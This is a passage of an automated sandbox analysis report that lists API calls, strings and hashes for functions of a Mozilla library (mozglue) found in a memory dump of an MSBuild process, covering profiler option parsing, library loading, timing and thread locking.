                                                                                                                                                                                                                                                                            Function 6CAFCC00 Relevance: 73.7, APIs: 25, Strings: 24, Instructions: 233stringCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,default,?,6CAC582D), ref: 6CAFCC27
                                                                                                                                                                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,java,?,?,?,6CAC582D), ref: 6CAFCC3D
                                                                                                                                                                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,6CB2FE98,?,?,?,?,?,6CAC582D), ref: 6CAFCC56
                                                                                                                                                                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,leaf,?,?,?,?,?,?,?,6CAC582D), ref: 6CAFCC6C
                                                                                                                                                                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,mainthreadio,?,?,?,?,?,?,?,?,?,6CAC582D), ref: 6CAFCC82
                                                                                                                                                                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileio,?,?,?,?,?,?,?,?,?,?,?,6CAC582D), ref: 6CAFCC98
                                                                                                                                                                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileioall,?,?,?,?,?,?,?,?,?,?,?,?,?,6CAC582D), ref: 6CAFCCAE
                                                                                                                                                                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,noiostacks), ref: 6CAFCCC4
                                                                                                                                                                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,screenshots), ref: 6CAFCCDA
                                                                                                                                                                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,seqstyle), ref: 6CAFCCEC
                                                                                                                                                                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,stackwalk), ref: 6CAFCCFE
                                                                                                                                                                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,jsallocations), ref: 6CAFCD14
                                                                                                                                                                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nostacksampling), ref: 6CAFCD82
                                                                                                                                                                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,preferencereads), ref: 6CAFCD98
                                                                                                                                                                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nativeallocations), ref: 6CAFCDAE
                                                                                                                                                                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,ipcmessages), ref: 6CAFCDC4
                                                                                                                                                                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,audiocallbacktracing), ref: 6CAFCDDA
                                                                                                                                                                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpu), ref: 6CAFCDF0
                                                                                                                                                                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,notimerresolutionchange), ref: 6CAFCE06
                                                                                                                                                                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpuallthreads), ref: 6CAFCE1C
                                                                                                                                                                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,samplingallthreads), ref: 6CAFCE32
                                                                                                                                                                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,markersallthreads), ref: 6CAFCE48
                                                                                                                                                                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,unregisteredthreads), ref: 6CAFCE5E
                                                                                                                                                                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,processcpu), ref: 6CAFCE74
                                                                                                                                                                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,power), ref: 6CAFCE8A
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: strcmp
                                                                                                                                                                                                                                                                            • String ID: Unrecognized feature "%s".$audiocallbacktracing$cpuallthreads$default$fileio$fileioall$ipcmessages$java$jsallocations$leaf$mainthreadio$markersallthreads$nativeallocations$noiostacks$nostacksampling$notimerresolutionchange$power$preferencereads$processcpu$samplingallthreads$screenshots$seqstyle$stackwalk$unregisteredthreads
                                                                                                                                                                                                                                                                            • API String ID: 1004003707-2809817890
                                                                                                                                                                                                                                                                            • Opcode ID: d028806d586291d00d1782798d26cf53c991150f2342015f461ae52c117253b4
                                                                                                                                                                                                                                                                            • Instruction ID: 5a6b822708df98f30b911da01f916ecf93b4c46d68b7c29677d3667c531deeba
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d028806d586291d00d1782798d26cf53c991150f2342015f461ae52c117253b4
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 47517495A452B512FB2431176D10BFF1408EF5225EF14483AF92DA3E80FA39D68B86F7
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 6CAC4470 Relevance: 43.9, APIs: 20, Strings: 5, Instructions: 178libraryloaderCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAC4730: GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6CAC44B2,6CB3E21C,6CB3F7F8), ref: 6CAC473E
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAC4730: GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6CAC474A
                                                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(WRusr.dll), ref: 6CAC44BA
                                                                                                                                                                                                                                                                            • LoadLibraryW.KERNEL32(kernel32.dll), ref: 6CAC44D2
                                                                                                                                                                                                                                                                            • InitOnceExecuteOnce.KERNEL32(6CB3F80C,6CABF240,?,?), ref: 6CAC451A
                                                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(user32.dll), ref: 6CAC455C
                                                                                                                                                                                                                                                                            • LoadLibraryW.KERNEL32(?), ref: 6CAC4592
                                                                                                                                                                                                                                                                            • InitializeCriticalSection.KERNEL32(6CB3F770), ref: 6CAC45A2
                                                                                                                                                                                                                                                                            • moz_xmalloc.MOZGLUE(00000008), ref: 6CAC45AA
                                                                                                                                                                                                                                                                            • moz_xmalloc.MOZGLUE(00000018), ref: 6CAC45BB
                                                                                                                                                                                                                                                                            • InitOnceExecuteOnce.KERNEL32(6CB3F818,6CABF240,?,?), ref: 6CAC4612
                                                                                                                                                                                                                                                                            • ?IsWin32kLockedDown@mozilla@@YA_NXZ.MOZGLUE ref: 6CAC4636
                                                                                                                                                                                                                                                                            • LoadLibraryW.KERNEL32(user32.dll), ref: 6CAC4644
                                                                                                                                                                                                                                                                            • memset.VCRUNTIME140(?,00000000,00000114), ref: 6CAC466D
                                                                                                                                                                                                                                                                            • VerSetConditionMask.NTDLL ref: 6CAC469F
                                                                                                                                                                                                                                                                            • VerSetConditionMask.NTDLL ref: 6CAC46AB
                                                                                                                                                                                                                                                                            • VerSetConditionMask.NTDLL ref: 6CAC46B2
                                                                                                                                                                                                                                                                            • VerSetConditionMask.NTDLL ref: 6CAC46B9
                                                                                                                                                                                                                                                                            • VerSetConditionMask.NTDLL ref: 6CAC46C0
                                                                                                                                                                                                                                                                            • VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6CAC46CD
                                                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 6CAC46F1
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,NativeNtBlockSet_Write), ref: 6CAC46FD
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ConditionMask$HandleModuleOnce$LibraryLoad$AddressExecuteInitProcmoz_xmalloc$CriticalDown@mozilla@@InfoInitializeLockedSectionVerifyVersionWin32kmemset
                                                                                                                                                                                                                                                                            • String ID: NativeNtBlockSet_Write$WRusr.dll$kernel32.dll$l$user32.dll
                                                                                                                                                                                                                                                                            • API String ID: 1702738223-3894940629
                                                                                                                                                                                                                                                                            • Opcode ID: 39c9f54a8b6eeee8cb775b9714d323bd3818444418fa98f8d6797293dd1d1887
                                                                                                                                                                                                                                                                            • Instruction ID: e41274454a8785cc5f66c928153341bb7624ad33a7f475e4923c043246f9cf79
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 39c9f54a8b6eeee8cb775b9714d323bd3818444418fa98f8d6797293dd1d1887
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 246117B0700398EFEB208F64CC09BA97BB8EF46309F088599E90C9B641D7759985CF52
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 6CAC9590 Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 192libraryloaderCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAB31C0: LoadLibraryW.KERNEL32(KernelBase.dll), ref: 6CAB3217
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAB31C0: GetProcAddress.KERNEL32(00000000,QueryInterruptTime), ref: 6CAB3236
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAB31C0: FreeLibrary.KERNEL32 ref: 6CAB324B
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAB31C0: __Init_thread_footer.LIBCMT ref: 6CAB3260
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAB31C0: ?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(?), ref: 6CAB327F
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAB31C0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CAB328E
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAB31C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6CAB32AB
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAB31C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6CAB32D1
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAB31C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6CAB32E5
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAB31C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6CAB32F7
                                                                                                                                                                                                                                                                            • LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6CAC9675
                                                                                                                                                                                                                                                                            • __Init_thread_footer.LIBCMT ref: 6CAC9697
                                                                                                                                                                                                                                                                            • LoadLibraryW.KERNEL32(ntdll.dll), ref: 6CAC96E8
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6CAC9707
                                                                                                                                                                                                                                                                            • __Init_thread_footer.LIBCMT ref: 6CAC971F
                                                                                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6CAC9773
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6CAC97B7
                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32 ref: 6CAC97D0
                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32 ref: 6CAC97EB
                                                                                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6CAC9824
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: LibraryTime$StampV01@@Value@mozilla@@$AddressFreeInit_thread_footerLoadProc$ErrorLastStamp@mozilla@@$Creation@Now@ProcessV12@V12@_
                                                                                                                                                                                                                                                                            • String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
                                                                                                                                                                                                                                                                            • API String ID: 3361784254-3880535382
                                                                                                                                                                                                                                                                            • Opcode ID: f5999c68a70a5bf5bb04934c3b380175b877ed4c3d9f0f8a24554158fcc37f96
                                                                                                                                                                                                                                                                            • Instruction ID: 89f9443adf4023fe9c4300dce77be5796d5a841770a78303229ed07fe34d3c59
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f5999c68a70a5bf5bb04934c3b380175b877ed4c3d9f0f8a24554158fcc37f96
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 37610571700255DFDF10DF78EA88B9E3BB5EB4A328F044559E91D97B80D730A898CB92
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 6CB0D4D0 Relevance: 21.2, APIs: 14, Instructions: 165threadCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CB0D4F0
                                                                                                                                                                                                                                                                            • AcquireSRWLockExclusive.KERNEL32(?), ref: 6CB0D4FC
                                                                                                                                                                                                                                                                            • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CB0D52A
                                                                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CB0D530
                                                                                                                                                                                                                                                                            • AcquireSRWLockExclusive.KERNEL32(?), ref: 6CB0D53F
                                                                                                                                                                                                                                                                            • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CB0D55F
                                                                                                                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6CB0D585
                                                                                                                                                                                                                                                                            • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6CB0D5D3
                                                                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CB0D5F9
                                                                                                                                                                                                                                                                            • AcquireSRWLockExclusive.KERNEL32(?), ref: 6CB0D605
                                                                                                                                                                                                                                                                            • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CB0D652
                                                                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CB0D658
                                                                                                                                                                                                                                                                            • AcquireSRWLockExclusive.KERNEL32(?), ref: 6CB0D667
                                                                                                                                                                                                                                                                            • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CB0D6A2
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ExclusiveLock$AcquireCurrentReleaseThread$Xbad_function_call@std@@free
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2206442479-0
                                                                                                                                                                                                                                                                            • Opcode ID: d571d475ba7577e43a74cd25ff100a3e813b0167402903448199d82de7658fc4
                                                                                                                                                                                                                                                                            • Instruction ID: 704b51fab80c8752c36682e150450fd74b382306c5cb8bce525a4f02ed04df9c
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d571d475ba7577e43a74cd25ff100a3e813b0167402903448199d82de7658fc4
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 61517D71604B45DFC714DF34D488A9ABBF4FF89318F008A2EE85A87751DB30A959CB91
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 6CAFEC70 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 81threadsynchronizationCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAF9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CAC4A68), ref: 6CAF945E
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAF9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CAF9470
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAF9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CAF9482
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAF9420: __Init_thread_footer.LIBCMT ref: 6CAF949F
                                                                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CAFEC84
                                                                                                                                                                                                                                                                            • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CAFEC8C
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAF94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6CAF94EE
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAF94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6CAF9508
                                                                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CAFECA1
                                                                                                                                                                                                                                                                            • AcquireSRWLockExclusive.KERNEL32(6CB3F4B8), ref: 6CAFECAE
                                                                                                                                                                                                                                                                            • ?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000), ref: 6CAFECC5
                                                                                                                                                                                                                                                                            • ReleaseSRWLockExclusive.KERNEL32(6CB3F4B8), ref: 6CAFED0A
                                                                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6CAFED19
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 6CAFED28
                                                                                                                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6CAFED2F
                                                                                                                                                                                                                                                                            • ReleaseSRWLockExclusive.KERNEL32(6CB3F4B8), ref: 6CAFED59
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • [I %d/%d] profiler_ensure_started, xrefs: 6CAFEC94
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ExclusiveLockgetenv$CurrentReleaseThread$?profiler_init@baseprofiler@mozilla@@AcquireCloseHandleInit_thread_footerObjectSingleWait__acrt_iob_func__stdio_common_vfprintf_getpidfree
                                                                                                                                                                                                                                                                            • String ID: [I %d/%d] profiler_ensure_started
                                                                                                                                                                                                                                                                            • API String ID: 4057186437-125001283
                                                                                                                                                                                                                                                                            • Opcode ID: 35196275f394a7e301f3eeee5f925fed76e365aa58fa3cf1e6dcc08e3195362f
                                                                                                                                                                                                                                                                            • Instruction ID: 0cfa34ff086a49e21b5e4a1aa6df2543a6cd79e29da0795af1fcbb383adb4ed2
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 35196275f394a7e301f3eeee5f925fed76e365aa58fa3cf1e6dcc08e3195362f
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0F210275600524ABDF109F28D908A9E3739EB4636DF144210FD2C87B81DB31984BCBF1
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 6CAB3480 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 86librarytimeloaderCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,6CAB3284,?,?,6CAD56F6), ref: 6CAB3492
                                                                                                                                                                                                                                                                            • GetProcessTimes.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6CAB3284,?,?,6CAD56F6), ref: 6CAB34A9
                                                                                                                                                                                                                                                                            • LoadLibraryW.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,6CAB3284,?,?,6CAD56F6), ref: 6CAB34EF
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 6CAB350E
                                                                                                                                                                                                                                                                            • __Init_thread_footer.LIBCMT ref: 6CAB3522
                                                                                                                                                                                                                                                                            • __aulldiv.LIBCMT ref: 6CAB3552
                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,6CAB3284,?,?,6CAD56F6), ref: 6CAB357C
                                                                                                                                                                                                                                                                            • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,6CAB3284,?,?,6CAD56F6), ref: 6CAB3592
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAEAB89: EnterCriticalSection.KERNEL32(6CB3E370,?,?,?,6CAB34DE,6CB3F6CC,?,?,?,?,?,?,?,6CAB3284), ref: 6CAEAB94
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAEAB89: LeaveCriticalSection.KERNEL32(6CB3E370,?,6CAB34DE,6CB3F6CC,?,?,?,?,?,?,?,6CAB3284,?,?,6CAD56F6), ref: 6CAEABD1
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CriticalLibraryProcessSectionTime$AddressCurrentEnterFileFreeInit_thread_footerLeaveLoadProcSystemTimes__aulldiv
                                                                                                                                                                                                                                                                            • String ID: GetSystemTimePreciseAsFileTime$kernel32.dll
                                                                                                                                                                                                                                                                            • API String ID: 3634367004-706389432
                                                                                                                                                                                                                                                                            • Opcode ID: 3406647288093e54549eb8835a8178154af8f09ddd440f423d21bbbc89549c74
                                                                                                                                                                                                                                                                            • Instruction ID: c6ff694b0d585461509558a1772a9741b4de38db6312c46f9df7a5b047ae9e66
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3406647288093e54549eb8835a8178154af8f09ddd440f423d21bbbc89549c74
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B731F675B01215AFDF20DFB8CA48EAE77B9FB45304F144519E549E3690DB70A944CF60
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 6CAB4480 Relevance: 16.8, APIs: 11, Instructions: 316COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free$moz_xmalloc
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3009372454-0
                                                                                                                                                                                                                                                                            • Opcode ID: 4f899b9250748cc2e25e65c2fcf07b466ffbd44bf0ee38af5cbbb2ca00518699
                                                                                                                                                                                                                                                                            • Instruction ID: 7dfee9e6bec6dd4fca0cce600d53366a11d1640d073cc18fa5de5077e6187691
